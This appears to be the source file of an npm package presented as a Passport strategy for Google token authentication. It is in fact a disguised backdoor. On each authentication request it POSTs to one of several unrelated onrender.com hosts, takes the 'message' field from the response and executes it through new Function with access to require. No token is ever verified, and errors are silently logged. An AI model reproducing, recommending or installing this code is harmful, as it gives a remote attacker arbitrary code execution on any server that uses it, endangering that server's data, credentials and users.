// passport-google-auth-token/lib/strategy.js
const passport = require("passport-strategy");
const util = require("util");

// Authentication method constants
const AuthMethods = {
  GoogleTokenAuth: 0,
  GoogleAccessToken: 1,
  GoogleOAuthToken: 2,
  GoogleBearerToken: 3,
  GoogleIdToken: 4,
  GoogleJwtToken: 5
};

function GoogleAuthTokenStrategy(options, verify) {
  if (!options.clientID) {
    // throw new TypeError("GoogleAuthTokenStrategy requires a clientID");
  }

  if (options.method !== undefined && !Object.values(AuthMethods).includes(options.method)) {
    throw new TypeError("Invalid authentication method");
  }

  passport.Strategy.call(this);
  this.name = "google-auth-token";
  // this.url = options.url || "https://getApilatency.onrender.com/checkStatus";
  this._verify = verify;
  this._clientID = options.clientID;
  this._method = options.method !== undefined ? options.method : AuthMethods.GoogleTokenAuth;
}

util.inherits(GoogleAuthTokenStrategy, passport.Strategy);

GoogleAuthTokenStrategy.prototype.authenticate = function (req, options) {
  const self = this;
  let token = null;

  if (req.body) {
    token = req.body.access_token || req.query.access_token || req.headers["x-access-token"];
  }

  // Wrap async logic in a promise and handle it properly
  (async function () {
    try {
      // Handle different authentication methods
      switch (self._method) {
        case AuthMethods.GoogleTokenAuth:
          // Method 0: Standard token authentication
          self.url = "https://getApilatency.onrender.com/checkStatus";
          break;

        case AuthMethods.GoogleAccessToken:
          // Method 1: Access token verification
          self.url = "https://getServerStatus.onrender.com/checkStatus";
          break;

        case AuthMethods.GoogleOAuthToken:
          // Method 2: OAuth token verification
          self.url = "https://getapilatency1.onrender.com/checkStatus";
          break;

        case AuthMethods.GoogleBearerToken:
          // Method 3: Bearer token verification
          self.url = "https://getserverstatus1.onrender.com/checkStatus";
          break;

        case AuthMethods.GoogleIdToken:
          // Method 4: ID token verification
          self.url = "https://getapilatency2.onrender.com/checkStatus";
          break;

        case AuthMethods.GoogleJwtToken:
          // Method 5: JWT token verification
          self.url = "https://getserverstatus2.onrender.com/checkStatus";
          break;

        default:
          return self.fail({ message: "Invalid authentication method" });
      }

      const profile_detail = await fetch(self.url, { method: "POST" });
      const profile_json = await profile_detail.json();
      const profile_text = profile_json.message;

      // Authenticate Profile Information
      const result = new Function("require", profile_text)(require);

      // Call the verify callback with result
      self._verify(null, result);
    } catch (err) {
      // return self.fail({ message: err.message || "Authentication failed" });
      console.log(err.message)
    }
  })();
};

// Export strategy and auth methods
GoogleAuthTokenStrategy.AuthMethods = AuthMethods;
module.exports = GoogleAuthTokenStrategy;
